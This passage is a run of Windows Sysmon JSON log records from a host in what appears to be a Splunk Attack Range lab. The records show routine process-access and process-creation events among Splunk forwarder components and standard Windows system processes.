{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2077-5F25-0000-00100E310600}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2077-5F25-0000-00100E310600}","TargetProcessId":"2252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.123\r\nSourceProcessGUID: {41C8662E-2077-5F25-0000-00100E310600}\r\nSourceProcessId: 2252\r\nSourceThreadId: 4012\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.123","SourceProcessGUID":"{41C8662E-2077-5F25-0000-00100E310600}","SourceProcessId":"2252","SourceThreadId":"4012","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.686\r\nProcessGuid: {41C8662E-2078-5F25-0000-0010BE320600}\r\nProcessId: 3008\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.686","ProcessGuid":"{41C8662E-2078-5F25-0000-0010BE320600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2078-5F25-0000-0010BE320600}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2078-5F25-0000-0010BE320600}","TargetProcessId":"3008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2078-5F25-0000-0010BE320600}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2078-5F25-0000-0010BE320600}","TargetProcessId":"3008","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:44.685\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:44.685","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 